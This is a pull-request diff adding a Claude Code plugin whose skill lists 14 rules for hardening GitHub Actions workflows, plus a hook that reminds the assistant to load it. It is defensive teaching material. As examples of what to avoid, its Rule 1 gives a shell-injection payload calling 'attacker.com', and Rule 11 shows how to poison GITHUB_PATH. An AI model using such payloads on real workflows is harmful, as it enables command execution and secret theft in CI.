### PR TITLE
Add security-tools plugin (secure-github-actions)

### DIFF
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -9,6 +9,11 @@
       "name": "skill-tools",
       "source": "./plugins/skill-tools",
       "description": "Tools for authoring and reviewing Claude Code skills."
+    },
+    {
+      "name": "security-tools",
+      "source": "./plugins/security-tools",
+      "description": "Harden GitHub Actions workflows against supply-chain and injection attacks."
     }
   ]
 }

--- a/README.md
+++ b/README.md
@@ -14,6 +14,7 @@ Add the marketplace, then install the plugin you want:
 ## Plugins
 
 - **[skill-tools](./plugins/skill-tools/)** — Tools for authoring and reviewing Claude Code skills. Includes the `skill-review` skill, which reviews skills against a closed 7-category quality rubric (Structural Discipline, Integrity, Test Coverage, Security, Content Quality, Convention, Cost) with structured JSON output and a determinism contract.
+- **[security-tools](./plugins/security-tools/)** — Harden GitHub Actions workflows against supply-chain and injection attacks. Includes the `secure-github-actions` skill (a 14-rule review checklist plus audit commands) and a hook that auto-loads it when you edit a workflow file.
 
 ## License
 

--- a/plugins/security-tools/.claude-plugin/plugin.json
+++ b/plugins/security-tools/.claude-plugin/plugin.json
@@ -1,0 +1,15 @@
+{
+  "name": "security-tools",
+  "version": "0.1.0",
+  "description": "Harden GitHub Actions workflows against supply-chain and injection attacks.",
+  "author": {
+    "name": "Fin 2x"
+  },
+  "keywords": [
+    "github-actions",
+    "security",
+    "supply-chain",
+    "ci"
+  ],
+  "license": "MIT"
+}

--- a/plugins/security-tools/CHANGELOG.md
+++ b/plugins/security-tools/CHANGELOG.md
@@ -1,0 +1,13 @@
+# Changelog
+
+All notable changes to the `security-tools` plugin are documented here.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [0.1.0] - 2026-07-07
+
+### Added
+
+- Initial release of the `security-tools` plugin.
+- `secure-github-actions` skill — hardens GitHub Actions workflows against supply-chain and injection attacks with a 14-rule review checklist and audit commands.

--- a/plugins/security-tools/LICENSE
+++ b/plugins/security-tools/LICENSE
@@ -1,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 Intercom
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

--- a/plugins/security-tools/README.md
+++ b/plugins/security-tools/README.md
@@ -15,6 +15,10 @@ Part of the [`fin-2x`](../../README.md) marketplace.
 
 - **[secure-github-actions](./skills/secure-github-actions/)** — Harden GitHub Actions workflows against supply-chain and injection attacks when creating, modifying, or reviewing a `.github/workflows/*.yml` file. 14 rules covering expression injection, SHA-pinning, least-privilege permissions, `pull_request_target`, and OIDC.
 
+## Hooks
+
+`security-tools` installs a `PostToolUse` hook that fires when you read or edit a file under `.github/workflows/` (or `.github/workflows-disabled/`) and reminds Claude to load the `secure-github-actions` skill, so workflow changes get the hardening review automatically. It is non-blocking — it only injects a context reminder.
+
 ## License
 
 MIT

--- a/plugins/security-tools/README.md
+++ b/plugins/security-tools/README.md
@@ -1,0 +1,20 @@
+# security-tools
+
+Harden GitHub Actions workflows against supply-chain and injection attacks.
+
+Part of the [`fin-2x`](../../README.md) marketplace.
+
+## Install
+
+```
+/plugin marketplace add intercom/2x-skills
+/plugin install security-tools@fin-2x
+```
+
+## Skills
+
+- **[secure-github-actions](./skills/secure-github-actions/)** — Harden GitHub Actions workflows against supply-chain and injection attacks when creating, modifying, or reviewing a `.github/workflows/*.yml` file. 14 rules covering expression injection, SHA-pinning, least-privilege permissions, `pull_request_target`, and OIDC.
+
+## License
+
+MIT

--- a/plugins/security-tools/hooks/hooks.json
+++ b/plugins/security-tools/hooks/hooks.json
@@ -1,0 +1,12 @@
+{
+  "hooks": {
+    "PostToolUse": [
+      {
+        "matcher": "Read|Edit|Write",
+        "hooks": [
+          { "type": "command", "command": "\"${CLAUDE_PLUGIN_ROOT}/hooks/secure-github-actions-auto-inject.sh\"" }
+        ]
+      }
+    ]
+  }
+}

--- a/plugins/security-tools/hooks/secure-github-actions-auto-inject.sh
+++ b/plugins/security-tools/hooks/secure-github-actions-auto-inject.sh
@@ -1,0 +1,28 @@
+#!/bin/bash
+# PostToolUse hook that auto-injects the secure-github-actions skill
+# when editing GitHub Actions workflow files
+
+hook_data=$(cat)
+
+# Fast path: this hook only acts on files under .github/workflows/ or
+# .github/workflows-disabled/ (the latter contains the former as a substring).
+# Claude Code matchers key on tool name, not path, so the harness fires this on
+# every Read/Edit/Write — gate on a cheap string compare before paying for jq.
+[[ "$hook_data" != *".github/workflows"* ]] && exit 0
+
+file_path=$(echo "$hook_data" | jq -r '.tool_input.file_path // .tool_input.filePath // ""')
+
+[[ -z "$file_path" ]] && exit 0
+
+if [[ "$file_path" == *".github/workflows/"*".yml" ]] || [[ "$file_path" == *".github/workflows/"*".yaml" ]] || [[ "$file_path" == *".github/workflows-disabled/"*".yml" ]] || [[ "$file_path" == *".github/workflows-disabled/"*".yaml" ]]; then
+    cat <<'EOF'
+{
+  "hookSpecificOutput": {
+    "hookEventName": "PostToolUse",
+    "additionalContext": "You are editing a GitHub Actions workflow file. You MUST use the Skill tool to invoke security-tools:secure-github-actions to ensure this workflow follows supply-chain and injection-attack hardening rules. Use: Skill(skill: \"security-tools:secure-github-actions\") if not already loaded."
+  }
+}
+EOF
+fi
+
+exit 0

--- a/plugins/security-tools/skills/secure-github-actions/SKILL.md
+++ b/plugins/security-tools/skills/secure-github-actions/SKILL.md
@@ -1,0 +1,619 @@
+---
+name: secure-github-actions
+description: |
+  Harden GitHub Actions workflows against supply-chain and injection attacks when
+  creating, modifying, or reviewing a `.github/workflows/*.yml` file. Skip for
+  unrelated CI work (other CI providers, Playwright harness, dependency pinning)
+  that does not touch a workflow YAML.
+metadata:
+  keywords: github actions, workflow yaml, .github/workflows, expression injection, SHA pin, pull_request_target, claude-code-action
+  version: "1.1"
+  user-invocable: true
+allowed-tools: Read Grep Glob Bash
+---
+
+# Secure GitHub Actions
+
+Enforces supply chain hardening rules for GitHub Actions workflows. Every rule below
+addresses a real vulnerability class found in security audits of production workflows.
+
+## When to Use
+
+- Writing a new `.github/workflows/*.yml` file
+- Modifying an existing workflow
+- Reviewing a PR that touches workflow files
+- Adding a secret, action reference, or reusable workflow call
+- Configuring `claude-code-action` or `claude-code-base-action`
+
+## When NOT to Use This Skill
+
+This skill is specifically for **GitHub Actions workflow YAML files**. If you reach it
+but the actual task is one of the below, **step aside**: say in a single line that the
+rules here only apply to `.github/workflows/*.yml` edits and continue with the real task.
+Do not run the audit grep commands or the pre-PR checklist on unrelated code.
+
+- **Other CI providers** (e.g. `pipeline.yml`, `.buildkite/`, CircleCI config) — use that provider's tooling
+- **Playwright / e2e harness setup** that does not edit a workflow YAML
+- **Dependency pinning** in `package.json`, `pnpm-lock.yaml`, `Gemfile`, etc. — even
+  though supply-chain–adjacent, the rules below are about workflow YAML idioms
+- **Generic CI investigation** with no workflow file change in scope
+- **Supply-chain questions about npm/pnpm/RubyGems** — use a package supply-chain scanner
+
+If a workflow file is *also* in scope alongside one of the above, apply the rules
+to the workflow file and step aside for the rest.
+
+## The Rules
+
+### Rules 1-11: All Repositories
+
+### Rule 1: No `${{ }}` in `run:` blocks
+
+**Never** interpolate any `${{ }}` expression directly in a `run:` block — route
+everything through `env:` variables. This applies to all expressions, not just
+attacker-controlled ones:
+
+- **Attacker-controlled values** (`github.event.*`, `inputs.*`) — shell injection risk
+- **Secrets** (`secrets.*`) — leak via `set -x`, shell errors, and process listings
+- **Context values** (`github.repository`, `github.run_id`, `steps.*.outputs.*`) — trains
+  bad habits, zizmor flags them, and any future refactor that introduces attacker input
+  into the same block inherits the anti-pattern
+
+```yaml
+# VULNERABLE — attacker-controlled title executes as shell
+run: |
+  TITLE="${{ github.event.issue.title }}"
+
+# ALSO WRONG — "not attacker-controlled" is not an excuse
+run: |
+  gh issue edit "${{ github.event.issue.number }}" --repo "${{ github.repository }}"
+  curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" "$URL"
+
+# SAFE — env vars are set before shell parses the script
+env:
+  ISSUE_TITLE: ${{ github.event.issue.title }}
+  ISSUE_NUMBER: ${{ github.event.issue.number }}
+  REPO: ${{ github.repository }}
+  GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+run: |
+  echo "$ISSUE_TITLE"
+  gh issue edit "$ISSUE_NUMBER" --repo "$REPO"
+```
+
+**Why:** GitHub expands `${{ }}` expressions via string interpolation *before* the shell
+sees the script. A malicious issue title like `"; curl attacker.com; "` breaks out of
+quotes and executes arbitrary commands. Env vars are injected as process environment,
+not text substitution, so shell metacharacters are inert.
+
+Even "safe" values like `github.repository` or `secrets.GITHUB_TOKEN` should go through
+`env:` — secrets can leak via `set -x` or shell error messages, and allowing some `${{ }}`
+in `run:` blocks trains the pattern as acceptable, leading to copy-paste injection bugs
+when the same block is extended with attacker-controlled values later.
+
+**Simple rule: if you see `${{ }}` inside a `run:` block, it's wrong. Move it to `env:`.**
+
+**Highest-risk expressions** (attacker-controlled — shell injection):
+- `github.event.issue.title`, `.body`
+- `github.event.comment.body`
+- `github.event.pull_request.title`, `.body`, `.head.ref`
+- `github.event.label.name`
+- `github.event.review.body`
+- `inputs.*` (workflow_dispatch, workflow_call)
+
+**Still wrong in `run:` blocks** (not attacker-controlled, but banned):
+- `secrets.*` — leak risk via shell diagnostics
+- `github.repository`, `github.run_id`, `github.server_url`
+- `steps.*.outputs.*`, `needs.*.outputs.*`, `job.status`
+- `github.event.issue.number`, `github.event.pull_request.number`
+
+**Safe in `with:` blocks** (YAML context, no shell): `${{ }}` in action `with:` inputs
+is safe from *shell* injection, but still a prompt injection vector if passed to AI tools.
+
+### Rule 2: No `secrets: inherit`
+
+Always use explicit `secrets:` mapping when calling reusable workflows. List exactly
+which secrets the called workflow needs.
+
+```yaml
+# VULNERABLE — exposes ALL repo secrets to the called workflow
+jobs:
+  notify:
+    uses: your-org/shared-workflows/.github/workflows/notify.yml@main
+    secrets: inherit
+
+# SAFE — only passes what's needed
+jobs:
+  notify:
+    uses: your-org/shared-workflows/.github/workflows/notify.yml@main
+    secrets:
+      SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}
+```
+
+**Why:** `secrets: inherit` passes every secret the caller has access to. If the
+called workflow's repo is compromised (pushed malicious code to `main`), every secret
+is exfiltrated. This is a well-documented real-world exfiltration path — incidents have
+traced back to a single `secrets: inherit` repeated across many workflows.
+
+### Rule 3: SHA-pin all action references
+
+Pin every `uses:` reference to a full commit SHA with a version comment.
+Only exception: trusted reusable workflows in a repo **you** control that has branch
+protection with required reviews (e.g. `your-org/shared-workflows@main`).
+
+```yaml
+# VULNERABLE — mutable tag, can change without notice
+uses: actions/checkout@v4
+uses: anthropics/claude-code-action@v1
+uses: anthropics/claude-code-base-action@beta
+
+# SAFE — immutable SHA with human-readable comment
+uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+uses: anthropics/claude-code-action@ad30de060ff4bb30eaa7e07042e4aebacfae7dac # v1.0.29
+```
+
+**How to resolve a SHA:**
+```bash
+# For tags:
+gh api repos/{owner}/{repo}/git/ref/tags/{tag} --jq '.object.sha'
+# For branches:
+gh api repos/{owner}/{repo}/git/ref/heads/{branch} --jq '.object.sha'
+```
+
+**Why:** Tags and branches are mutable. A compromised upstream repo can point `@v1` to
+malicious code. SHAs are immutable — the only tamper-proof reference.
+
+### Rule 4: Trusted actions only
+
+Restrict which actions can run in your org (Settings → Actions → *Allow select actions*).
+A tight allowlist is a strong supply-chain control. A good baseline:
+
+- `actions/*`, `github/*` — GitHub first-party (org-level toggle)
+- Your own org's actions (`your-org/*`)
+- `anthropics/*` — Claude code actions, if used
+- A short, explicitly-vetted list of third-party actions you actually depend on
+  (e.g. `ruby/setup-ruby`, `pnpm/action-setup`) — each pinned by SHA
+
+Anything not on the allowlist is blocked. Before adding a new third-party action, prefer
+`gh` CLI or `actions/github-script` over taking on a new dependency.
+
+```yaml
+# Instead of a third-party action:
+- run: gh issue comment "$ISSUE_NUMBER" --body "Processed by CI"
+  env:
+    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+    ISSUE_NUMBER: ${{ github.event.issue.number }}
+```
+
+#### Prefer native solutions over third-party actions
+
+Before adding a third-party action — or widening the allowlist to permit one — ask whether
+the same behaviour is achievable with a few more lines of native code. If yes, use the
+native approach: it keeps the org's third-party action surface smaller, eliminates a
+SHA-pinning maintenance burden, and removes a supply chain attack vector entirely.
+
+**Native alternatives to reach for first:**
+
+| Need | Native solution |
+|------|----------------|
+| GitHub API calls (labels, comments, PRs, issues) | `actions/github-script` (always on allowlist) |
+| `gh` CLI operations | `run:` step with `GH_TOKEN` env var |
+| Simple HTTP requests | `run:` step with `curl` |
+| File manipulation, string processing | `run:` step with standard shell tools |
+
+```yaml
+# AVOID — third-party action for a trivial operation
+- uses: dessant/label-actions@abc123 # v4
+  # Requires config file + adds third-party dep to supply chain
+
+# PREFER — same behaviour as two GitHub API calls in actions/github-script
+- name: Re-add label and explain
+  uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8
+  with:
+    script: |
+      await github.rest.issues.createComment({
+        owner: context.repo.owner,
+        repo: context.repo.repo,
+        issue_number: context.issue.number,
+        body: ':wave: This label is managed by CI.'
+      });
+      await github.rest.issues.addLabels({
+        owner: context.repo.owner,
+        repo: context.repo.repo,
+        issue_number: context.issue.number,
+        labels: ['protected-label']
+      });
+```
+
+**The bar for keeping a third-party action:** the native equivalent would require
+significantly more code or is clearly not maintainable inline (e.g., complex
+multi-step setup actions like `ruby/setup-ruby`). "A few more lines" is not a reason
+to keep a dependency.
+
+### Rule 5: Always declare `permissions:`
+
+Every workflow MUST have a top-level `permissions:` block with least privilege.
+Even when the org default is read-only, declaring permissions explicitly is
+defense in depth — org defaults can change, and explicit is self-documenting.
+
+```yaml
+permissions:
+  contents: read
+  issues: write
+  pull-requests: read
+```
+
+Only add permissions the workflow actually needs. Common mistakes:
+- `id-token: write` when not using OIDC — remove it. **Exception: reusable-workflow
+  callers** — if the job `uses:` a reusable workflow, do **not** strip `id-token: write`
+  (or any scope) just because the caller's own steps don't reference it; the callee may
+  need it. See "Reusable workflow callers" below.
+- `contents: write` when only reading — use `read` (same caller exception)
+- Missing block entirely — defaults to repo-wide setting
+
+#### The API namespace is NOT the permission scope
+
+Do **not** derive the permission scope from the REST method's namespace. For the Actions
+default `GITHUB_TOKEN`, the permission check keys off the **resource being acted on**, not
+the API path. The trap: **commenting on a pull request with the `GITHUB_TOKEN` requires
+`pull-requests: write`** even though the call goes through the *issues* namespace
+(`github.rest.issues.createComment`, `gh pr comment`, `gh issue comment` on a PR). PRs are
+issues in the REST data model, but the `GITHUB_TOKEN` permission gate treats a PR as a PR.
+
+Commenting on a real **issue** does take `issues: write` — keep that scope for
+issue-comment workflows, and do not flag it. The point is narrower: `issues: write` does
+**not** also unlock commenting on a **PR** under the `GITHUB_TOKEN`. (GitHub's "Create an
+issue comment" REST reference lists `issues: write` as accepted, but that describes issue
+targets and fine-grained PATs; the `GITHUB_TOKEN`-on-a-PR path is the exception this rule
+exists for.)
+
+This is not theoretical. A real PR-commenting workflow ran fine with `pull-requests: write`
+(and no `issues:` scope). A hardening pass changed it to `pull-requests: read` +
+`issues: write`, and the `github.rest.issues.createComment` call failed at runtime:
+
+```
+RequestError [HttpError]: Resource not accessible by integration
+status: 403
+'x-accepted-github-permissions': 'issues=write; pull_requests=write'
+```
+
+`issues: write` was present yet the comment still 403'd, because `pull-requests` had been
+downgraded to `read`. The minimal scope that works is **`pull-requests: write` alone** —
+before the breaking change the workflow commented on PRs with `pull-requests: write` and no
+`issues:` scope at all. So for a PR-comment workflow, grant `pull-requests: write` and
+never downgrade it to `read`; add `issues: write` **only** if the same workflow also
+comments on or manages real *issues*. `issues: write` is neither sufficient for PR comments
+nor required when only PRs are touched. (GitHub's `x-accepted-github-permissions` header
+lists `issues=write; pull_requests=write`, but it is over-broad here — the production
+before-state proves `pull-requests: write` on its own is enough.)
+
+```yaml
+# BROKEN — workflow triggers on pull_request and posts a comment on the PR,
+# but pull-requests was downgraded to read because the call "uses issues.createComment".
+# The comment API returns 403 at runtime; the step fails.
+permissions:
+  pull-requests: read   # WRONG for a workflow that comments on PRs
+  issues: write
+
+# SAFE — commenting on a PR target needs pull-requests: write
+permissions:
+  pull-requests: write
+```
+
+Quick scope map for the common operations:
+
+| Operation | Required scope |
+|-----------|---------------|
+| Comment on a **PR** with `GITHUB_TOKEN` (`issues.createComment` / `gh pr comment` on a PR) | `pull-requests: write` (sufficient on its own; `issues: write` is neither required nor sufficient for PR comments) |
+| Comment on an **issue** | `issues: write` |
+| Add/remove labels on an issue | `issues: write` |
+| Add/remove labels on a PR | `issues: write` or `pull-requests: write` (label endpoints accept either) |
+| Reusable-workflow caller whose callee uses OIDC | keep `id-token: write` (do not strip) |
+| List PR files / read PR metadata (`pulls.listFiles`, `pulls.get`) | `pull-requests: read` |
+| Edit PR title/body (`pulls.update`) | `pull-requests: write` |
+| Request PR reviewers (`pulls.requestReviewers`) | `pull-requests: write` |
+
+#### Never downgrade an existing `write` scope during a hardening pass without checking what runs
+
+Least privilege means removing scopes the workflow does **not** use — not blindly
+narrowing every `write` to `read`. Before lowering an existing `write` scope (especially
+`pull-requests: write`), read every step and confirm the workflow does not *write* to
+that resource at runtime. A workflow that posts PR comments, edits PRs, or manages
+labels genuinely needs its write scope; downgrading it produces a silent 403 that CI
+may still log as green. When in doubt, keep the existing `write` scope and flag it for
+manual confirmation rather than narrowing it.
+
+#### Reusable workflow callers: caller caps callee
+
+For reusable-workflow callers, the rule above is **functional**, not just
+defense-in-depth: the callee's `permissions:` block can only restrict the
+caller's, never expand it. Without a caller block, the callee's writes get
+silently clipped — the workflow logs green while the API call returns 403/404
+inside the script.
+
+Mirror every scope the callee declares at the caller's top level.
+
+```yaml
+# BROKEN — callee declares `permissions: issues: write` for label management,
+# but the caller's missing permissions block clips the request to read-only.
+# Workflow logs green; labelling silently fails.
+jobs:
+  call-label-prs:
+    uses: your-org/shared-workflows/.github/workflows/label-prs.yml@main
+
+# SAFE — caller grants what the callee needs.
+permissions:
+  contents: read
+  issues: write
+jobs:
+  call-label-prs:
+    uses: your-org/shared-workflows/.github/workflows/label-prs.yml@main
+```
+
+**You usually cannot see what the callee needs from the caller alone.** A reusable
+workflow lives in another file (often another repo), so a scope the caller's own steps
+never reference is **not** evidence it's unused — the callee may depend on it. Never strip
+a scope from a reusable-workflow caller on "the caller doesn't use it" reasoning. To
+verify, read the callee's top-level `permissions:` (and what its steps do); if you can't,
+**keep the existing scope** and leave an inline comment so the next hardening pass does too.
+
+`id-token: write` is the highest-stakes example. A caller that only `uses:` a reusable
+workflow has no OIDC step of its own, so a hardening pass that can't see the callee reads
+`id-token: write` as "unnecessary" and strips it — but if the callee authenticates to a
+cloud via OIDC (`aws-actions/configure-aws-credentials`, etc.), the caller's cap now
+denies it. This is rejected at **run-creation time** → `startup_failure`: no jobs, no
+logs, just a red X. (This is a real failure mode: an org-wide reusable workflow that
+uploads to cloud storage via OIDC broke every caller that had `id-token: write` stripped —
+every push failed with `startup_failure`.)
+
+```yaml
+# BROKEN — caller dropped id-token: write because no caller step uses OIDC.
+# The callee uploads to cloud storage via OIDC; run creation fails with startup_failure.
+permissions:
+  contents: read
+jobs:
+  upload-sbom:
+    uses: your-org/shared-workflows/.github/workflows/upload-sbom.yml@main
+
+# SAFE — keep id-token: write; the callee's OIDC step needs it.
+permissions:
+  contents: read
+  id-token: write   # required by the reusable callee for OIDC cloud upload
+jobs:
+  upload-sbom:
+    uses: your-org/shared-workflows/.github/workflows/upload-sbom.yml@main
+```
+
+Note the two distinct failure modes: a clipped **`GITHUB_TOKEN`** scope (issues,
+pull-requests, contents…) fails *inside* the callee at API-call time (403/404, often
+logs green); a clipped **`id-token: write`** fails at *run creation* (`startup_failure`,
+no logs at all).
+
+### Rule 6: No unpinned runtime dependencies
+
+No `npx @latest`, no `git clone` at HEAD, no `npm install` without a lockfile.
+
+```yaml
+# VULNERABLE
+run: npx @modelcontextprotocol/server-github@latest
+run: npx -y @sentry/mcp-server@latest
+run: git clone https://github.com/org/repo.git && cd repo && npm install
+
+# SAFE — pinned to exact version
+run: npx @modelcontextprotocol/server-github@1.2.3
+# SAFE — pinned to commit SHA with lockfile
+env:
+  REPO_SHA: "abc123def456"
+run: |
+  git clone https://github.com/org/repo.git
+  cd repo
+  git checkout "$REPO_SHA"
+  npm ci
+```
+
+**Common mistake:** `git clone --revision` is **not a valid git flag** — it gets silently
+ignored, cloning HEAD instead of the pinned SHA. Use `git clone` followed by
+`git checkout "$SHA"`. For shallow clones, use `git fetch --depth 1 origin "$SHA"` after init.
+
+**Why:** `@latest` and HEAD are mutable references that resolve at runtime. A
+compromised package or repo delivers malicious code the next time the workflow runs.
+
+### Rule 7: Never checkout untrusted code with secrets
+
+If using `pull_request_target`, **never** checkout the PR head in a job that has secrets.
+Split into two jobs:
+
+```yaml
+jobs:
+  # Job 1: Unprivileged — validates the PR
+  validate:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    outputs:
+      safe: ${{ steps.check.outputs.safe }}
+    steps:
+      - name: Validate via API (no checkout of PR code)
+        id: check
+        env:
+          GH_TOKEN: ${{ github.token }}
+        run: |
+          # Validate using GitHub API only — never run PR code
+
+  # Job 2: Privileged — acts on validated PR (never checks out PR code)
+  act:
+    needs: validate
+    if: needs.validate.outputs.safe == 'true'
+    runs-on: ubuntu-latest
+    steps:
+      - name: Label PR via API
+        env:
+          GH_TOKEN: ${{ secrets.ELEVATED_TOKEN }}
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+        run: gh pr edit "$PR_NUMBER" --add-label "validated"
+```
+
+**Trusted script pattern** (when you need both base code and PR history):
+```yaml
+steps:
+  - name: Checkout base branch (trusted code)
+    uses: actions/checkout@SHA # pinned
+  - name: Preserve trusted script
+    run: cp script/security/scanner.rb /tmp/trusted_scanner.rb
+  - name: Fetch PR head (for git history only)
+    env:
+      PR_NUMBER: ${{ github.event.issue.number }}
+    run: |
+      git fetch origin "pull/$PR_NUMBER/head"
+      git checkout FETCH_HEAD
+  - name: Run trusted script
+    run: ruby /tmp/trusted_scanner.rb
+```
+
+### Rule 8: No `pull_request_target` unless necessary
+
+Prefer `pull_request` trigger. It runs in the context of the fork with no secrets access,
+which is safe by default.
+
+`pull_request_target` grants secrets and write permissions to code triggered by a fork PR.
+If you must use it, document why in a YAML comment and follow the split-job pattern from
+Rule 7.
+
+```yaml
+# SAFE default — use this
+on:
+  pull_request:
+    types: [opened, synchronize]
+
+# DANGEROUS — only if you need secrets for fork PRs, with documented justification
+on:
+  pull_request_target:  # Required because: [specific reason]
+    types: [opened, synchronize]
+```
+
+### Rule 9: Scope Claude/AI tool access when handling untrusted input
+
+When using `claude-code-action` or `claude-code-base-action` on workflows that
+process untrusted input (issue bodies, PR diffs, external content), scope
+`allowed_tools` to limit blast radius from prompt injection.
+
+```yaml
+# Higher risk — if the workflow processes untrusted input
+with:
+  allowed_tools: "Read,Write,Edit,Bash,Glob,Grep"
+
+# Lower risk — scoped to specific CLI patterns
+with:
+  allowed_tools: "Read,Grep,Glob,Bash(gh issue:*),Bash(gh pr:*)"
+```
+
+**Why:** If Claude processes attacker-controlled content (issue bodies, PR diffs),
+prompt injection could lead to unintended command execution. Scoping `Bash` to
+specific patterns reduces the blast radius.
+
+### Rule 10: Actions creating or approving PRs
+
+GitHub provides an org/repo setting — *Allow GitHub Actions to create and approve pull
+requests* — that is **off by default**, and turning it off is recommended: it closes a
+privilege-escalation path where a workflow self-approves or opens PRs. With it off, any
+workflow that tries to create or approve a PR fails with a permissions error.
+
+If you keep it off (recommended), migrate workflows that create or approve PRs:
+
+- **PR approvals / creation** → Use a dedicated GitHub App with narrowly-scoped
+  permissions and policy enforcement, not the Actions `GITHUB_TOKEN`
+
+Remove any `gh pr review --approve`, `gh pr create`, or equivalent API calls
+from workflow `run:` blocks when the setting is off. If reviewing a workflow that still
+contains PR creation or approval steps under that policy, flag it as a required migration.
+
+### Rule 11: Guard `GITHUB_ENV` and `GITHUB_PATH` from untrusted input
+
+Never write attacker-controlled values to `GITHUB_ENV` or `GITHUB_PATH`. These files
+modify the environment for **all subsequent steps** in the job.
+
+```yaml
+# VULNERABLE — attacker-controlled label written to GITHUB_ENV
+run: |
+  echo "LABEL=${{ github.event.label.name }}" >> $GITHUB_ENV
+
+# VULNERABLE — untrusted step can poison PATH for later steps
+run: echo "/tmp/attacker-bin" >> $GITHUB_PATH
+
+# SAFE — use env: block, don't propagate to GITHUB_ENV
+env:
+  LABEL: ${{ github.event.label.name }}
+run: |
+  echo "Processing $LABEL"
+```
+
+**Why:** A compromised or attacker-influenced step can set `LD_PRELOAD`, inject
+malicious binaries into `PATH`, or override variables consumed by later steps.
+Unlike `env:` blocks (scoped to one step), `GITHUB_ENV` persists across all
+subsequent steps in the job.
+
+## Public Repository Rules (Rules 12-14)
+
+**Public repos enforce three extra rules on top of Rules 1-11.** Before reviewing, detect repo visibility:
+```bash
+gh repo view --json visibility -q '.visibility'
+```
+If the result is `PUBLIC`, load [`references/public-repo-rules.md`](references/public-repo-rules.md) and
+enforce Rules 12-14 (LOTP / no secrets on fork PR builds, `persist-credentials: false` on checkout,
+and OIDC over long-lived cloud secrets) in addition to the all-repo rules above. Skip this reference
+for private repos — Rules 12-14 do not apply there.
+
+## Pre-PR Checklist
+
+Run this against your workflow before submitting. Every item maps to a rule above.
+
+```
+[ ] No ${{ }} expressions of any kind in run: blocks (Rule 1)
+[ ] No secrets: inherit — all secrets explicitly mapped (Rule 2)
+[ ] Every uses: reference is SHA-pinned with version comment (Rule 3)
+    Exception: a trusted reusable-workflow repo you control with branch protection
+[ ] All actions are on the org allowlist (Rule 4)
+[ ] Third-party actions replaced with native alternatives where feasible (Rule 4)
+[ ] Top-level permissions: block with least privilege (Rule 5)
+[ ] If calling a reusable workflow, caller permissions: grants at least every scope the callee declares (Rule 5)
+[ ] Reusable-workflow caller: no scope stripped on "caller doesn't use it" reasoning — keep id-token: write (and others) the callee needs; stripping id-token: write causes startup_failure (Rule 5)
+[ ] PR-commenting workflows keep pull-requests: write — scope mapped by target resource, not API namespace; existing write scopes not downgraded without checking the steps (Rule 5)
+[ ] No npx @latest, git clone at HEAD, or npm install without lockfile (Rule 6)
+[ ] If pull_request_target: no PR head checkout in jobs with secrets (Rule 7)
+[ ] pull_request used instead of pull_request_target where possible (Rule 8)
+[ ] Claude allowed_tools scoped if workflow processes untrusted input (Rule 9)
+[ ] No PR creation or approval steps if the org setting is off — use a GitHub App (Rule 10)
+[ ] No attacker-controlled values written to GITHUB_ENV or GITHUB_PATH (Rule 11)
+[ ] (Public repos) No secrets in fork PR build jobs (Rule 12)
+[ ] (Public repos) persist-credentials: false on checkout (Rule 13)
+[ ] (Public repos) OIDC tokens over long-lived secrets for cloud auth (Rule 14)
+```
+
+## Quick Audit Command
+
+To scan an existing set of workflows for violations of the rules above, load
+[`references/audit-commands.md`](references/audit-commands.md) — it ships one grep/awk command per rule
+(stray `${{ }}` in `run:`, `secrets: inherit`, unpinned `uses:`, missing `permissions:`, unpinned `npx`,
+PR creation/approval, unscoped Claude `Bash`, `GITHUB_ENV`/`GITHUB_PATH` writes, missing `persist-credentials`).
+
+## Common Mistakes
+
+| Mistake | Why It's Wrong | Fix |
+|---------|---------------|-----|
+| Using a third-party action for a trivial operation | Adds supply chain surface, SHA maintenance, and may need allowlist widening | Replace with `actions/github-script`, `gh` CLI, or `run:` step |
+| `echo "${{ github.event.issue.title }}"` | Shell injection before echo runs | Use `env:` + `$ISSUE_TITLE` |
+| `curl -H "Bearer ${{ secrets.TOKEN }}"` | Secret leaks via `set -x` or shell errors | Use `env: GH_TOKEN: ${{ secrets.TOKEN }}` |
+| `git clone --revision "$SHA" repo.git` | `--revision` is not a valid git flag — silently clones HEAD | Use `git clone` then `git checkout "$SHA"` |
+| `secrets: inherit` with `@main` ref | All secrets exposed if upstream compromised | Explicit `secrets:` mapping |
+| Dropping the `secrets:` block when the callee declares accepted inputs | Callee falls back to its default (often `${{ github.token }}` with caller-bounded scopes); if you needed a different token or override, the side effect silently fails | Read the callee's top-level `secrets:` declaration; explicitly map every input you need with `${{ secrets.X }}` |
+| `uses: action@v1` | Tag can be force-pushed to malicious commit | SHA-pin: `action@abc123 # v1` |
+| `npx package@latest` | Resolves to whatever is published right now | Pin exact version |
+| `pull_request_target` + `actions/checkout` of PR head | Untrusted code runs with secrets | Split into unprivileged + privileged jobs |
+| Omitting `permissions:` block | Inherits repo default (may be `write-all`) | Declare minimum permissions |
